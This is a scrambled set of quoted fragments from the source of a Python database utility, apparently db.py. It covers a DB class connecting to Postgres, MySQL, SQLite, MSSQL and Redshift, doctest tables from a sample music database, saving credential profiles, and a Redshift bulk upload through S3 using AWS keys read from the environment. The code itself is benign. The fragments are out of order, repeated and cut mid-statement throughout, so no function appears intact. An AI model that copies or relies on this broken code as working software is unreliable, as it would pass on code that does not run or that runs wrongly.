DW1.XL nodes have 2 slices per node, so", "is used to control the rendering of PrettyTable a bit. 
None means that", "| | Employee | EmployeeId | INTEGER | | Employee | Address |", "\".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a", "TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) #", "'', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname", "AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results", "= dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column =", "self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or", "INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId", "this is # much faster when it comes time to run the \\COPY", "column metadata for all tables as list of tuples if told to use", "data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all those doctests", "in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif", "if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import", "table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet", "isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: #", "CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine", "self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's schema 
for", "not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache =", "HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL =", "elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur", "perform the \\COPY here. the s3 argument is a prefix, so it'll pick", "| INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine |", "\"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name,", "UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1 Balls", "| MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER", "will try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to", "Aggresively search through your database's schema for a column. Parameters ----------- search: str", "= DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db", "TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t", "exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise", "\"INTEGER\"]).columns) 17 -= Should sort in some way for all those doctests to", "(False) whether you'd like to drop the table if it already exists chunk_size:", "a bit. 
None means that you'll have verrrrrrrry wide columns in some cases.", "\"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q})", "to using keys, you can use an S3 object print_sql: bool (False) option", "False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID", "all columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type |", "port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\",", "all columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name", "limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432", "server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and", "= ''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as", "if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY =", "pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to", "self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit", "= \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data)", "= False try: import pyodbc as pyo HAS_ODBC = True except ImportError: try:", "= MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect", "in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}',", "''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... 
Album", "Up 1 1 7 8 Inject The Venom 1 1 8 9 Snowballed", "like your queries exclude_system_tables: bool Whether or not to include \"system\" tables (the", "the naive approach if use_cache: # generate our Tables, and load them into", "3 2 3 4 Restless and Wild 3 2 4 5 Princess of", "self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver", "\\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key)", "name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys", "You 7 For Those About To Rock We Salute You 8 For Those", "Parameters ---------- filename: str A SQL script data: list, dict Optional argument for", "9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>,", "'\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port)", "1433 filename: str path to sqlite database dbname: str Name of the database", "= dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver =", "in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else:", "frame you want to save to the db drop_if_exists: bool (False) whether you'd", "feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else:", "= self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please", "to the db drop_if_exists: bool (False) whether you'd like to drop the table", "pieces. 
according to amazon, this is # much faster when it comes time", "db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For", "def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables',", "KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table,", "db_dict def list_profiles(): \"\"\" Lists all of the database profiles available Examples --------", "len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock", "1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select *", "None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\":", "raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql, mssql,", "region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\")", "= self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta", "self._try_command(sql) # generate schema from pandas and then adapt for redshift sql =", "| NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType |", "db = DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>>", "Exception(\"Couldn't find boto library. 
Please ensure it is installed\") if s3 is not", "About To Rock We Salute You 9 For Those About To Rock We", "keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = []", "pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table metadata for", "same order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+", "\"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate", "DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\")", "comes time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0}", "to query the system tables. limit: int, None Default number of records to", "try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False", "= DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None,", "arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\"", "INTEGER | | Invoice | CustomerId | INTEGER | | Invoice | BillingAddress", "[] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")]", "... {\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name cnt 0 Album 347", "hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db =", "| Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name |", "'{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your", "len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY,", "profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port", "Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is installed\")", "sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\",", "table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\")", "Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice", "DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For", "from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns)", "sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname: str Name", ">>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>>", "self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if", "database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User", "a second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name", "= ''' ... SELECT ... 
{{#cols}} ... {{#if @last}} ... {{ . }}", "as list of tuples, to match how normal loading is performed for col", "import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try:", "{limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q = \"select top", "tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in", "except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname", "port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con", "2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719", "DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\")", "= \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif", "server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif", "the Wall 2 2 3 Restless and Wild 2 3 4 Let There", "About To Rock We Salute You Name UnitPrice 0 For Those About To", "INTEGER | | Employee | Address | NVARCHAR(70) | | Genre | GenreId", "or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users", "database schemas: list List of schemas to include. Defaults to all. 
profile: str", "Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2", "0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5", "= cache if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile)", "in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn", "= pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3", "gzip try: from StringIO import StringIO # Python 2.7 except: from io import", "= load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port =", "elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con =", "them in script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e.", "is None, the function will try and grab AWS_SECRET_KEY from your environment variables", "<NAME>, U. D... 252051 4 1 Deaffy & R.A. 
Smith-Diesel 375418 5 1", "port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port", "everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table)", "DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db =", "data_type = [data_type] cols = [] for table in self.tables: for col in", "-------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from", "'' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username,", "glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in", "schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\":", "3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock We Salute", "database. Parameters ---------- username: str Your username for the database password: str Your", "doing it one time, database-wide, if query is available elif not use_cache and", "# Three modes for refreshing schema # 1. load directly from cache #", "s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV", "for how you like your queries exclude_system_tables: bool Whether or not to include", "0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE>", "Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and Wild", "querying a database. 
Parameters ---------- username: str Your username for the database password:", "| | Customer | SupportRepId | INTEGER | | Customer | CustomerId |", "<NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider", "< (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query", "[] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd):", "wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\", "database libraries # TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG", "| | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns", "3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561", "location in which to create the temporary transfer s3 bucket. This should match", "you like your queries exclude_system_tables: bool Whether or not to include \"system\" tables", "Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER |", "search, data_type=None): \"\"\" Aggresively search through your database's schema for a column. 
Parameters", "dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port =", "self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our", "(table_schema, table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name] =", "installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL:", "DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None,", "dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\")", "5 Put The Finger On You 0.99 6 Let's Get It Up 0.99", "columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name |", "Track | Milliseconds | INTEGER | | Track | GenreId | INTEGER |", "4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662", "MediaType | Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) |", "limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones", "your database's schema for a column. Parameters ----------- search: str glob pattern for", "= creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\")", "of the database schemas: list List of schemas to include. 
Defaults to all.", "FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table", "if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q", "Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out =", "On You 1 1 6 7 Let's Get It Up 1 1 7", "is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is", "| | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress |", "drop the table if it already exists chunk_size: int (10000) Number of DataFrame", "for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and", "self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname self.port =", "stop your little sister from stealing your passwords. Parameters ---------- profile: str (optional)", "+--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name", "schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system']", "environment variables AWS_SECRET_KEY: str your aws secrety key. if this is None, the", "list List of schemas to include. Defaults to all. profile: str Preconfigured database", "| TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER | |", "| NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an", "= pd.io.sql.get_schema(df, name) # defaults to using SQLite format. 
need to convert it", "table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple", "cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table", "D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>,", ">>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results", "exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out column metadata", "pymssql libraries. Please ensure one of them is installed\") if HAS_ODBC: base_con =", "load directly from cache # 2. use a single query for getting all", "= creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype =", "database (i.e. \"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\",", "self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise", "will return any handlebars queries as a single data frame. limit: int Number", "function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this", "rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue", "\"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur =", "t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t ...", "use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load", "f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile)", "grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key. 
if", "| Playlist | Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200)", "def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\"", "and Wild 4 Restless and Wild 5 For Those About To Rock We", "t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],", "reference keys. This is used to control the rendering of PrettyTable a bit.", "Venom 1 1 8 9 Snowballed 1 1 9 10 Evil Walks 1", "your queries exclude_system_tables: bool Whether or not to include \"system\" tables (the ones", "threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE", "so it'll pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying", "# Python 3.3+ import uuid import re import os import sys from collections", "Wild 2 3 4 Let There Be Rock 1 4 5 Big Ones", "# generate our Columns, and attach to each table to the table name", "data frame. limit: int Number of records to return Examples -------- >>> from", "column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like", "\\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] %", "'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432,", "10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We Salute", "tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False", "if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif", "for the database hostname: str Hostname your database is running on (i.e. 
\"localhost\",", "EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here.", "\"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg", "one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\"", "chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn =", "We Salute You 9 For Those About To Rock We Salute You Name", "Table | Column Name | Type | +-----------+-------------+---------------+ | Artist | Name |", "refreshing schema # 1. load directly from cache # 2. use a single", "load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata']", "Ex: DW1.XL nodes have 2 slices per node, so if running 2 nodes", "is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into", "for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row", "= profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]]", "self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname", "Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) |", "column. 
Parameters ----------- search: str glob pattern for what you're looking for data_type:", "profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None,", "1 8 9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId", "\"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username')", "os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name,", "table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF", "343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W.", "(at least ones that fit into our framework), so we're going to create", "self.con.commit() # perform the \\COPY here. the s3 argument is a prefix, so", "1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0", "<NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994", "the database is running on. defaults to default port for db. portgres: 5432", "Lists all of the database profiles available Examples -------- No doctest, covered by", "1 1 7 8 Inject The Venom 1 1 8 9 Snowballed 1", "5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to", "To Rock We Salute You 8 For Those About To Rock We Salute", "file. This is not to say this a secure way to store sensitive", "| Address | NVARCHAR(70) | | Genre | GenreId | INTEGER | |", "are not in the same order, making doctest fail. db.find_column(\"Name\") # returns all", "INTEGER | | Employee | EmployeeId | INTEGER | | Genre | GenreId", "... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\",", "name }}' as table_name, ... COUNT(*) as cnt ... FROM ... 
{{ name", "returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type", "q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q =", "Those About To Rock We Salute You 7 For Those About To Rock", "save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your db.py", "creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if", "0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99", "either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None:", "= schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype", "how you like your queries exclude_system_tables: bool Whether or not to include \"system\"", "going to chunk the file into pieces. according to amazon, this is #", "to upload and COPY from S3. Upload speed is *much* faster if chunks", "INTEGER | | Track | GenreId | INTEGER | | Track | Bytes", "running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws", "db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20", "{\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name cnt 0 Album 347 1", "= creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit =", "t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta =", "k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue())", "if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname,", "S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes", "Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = '''", "pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import", ">>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To", "dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\")", "exploring and querying a database. Parameters ---------- username: str Your username for the", "the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: #", "Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+", ". }} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ... 
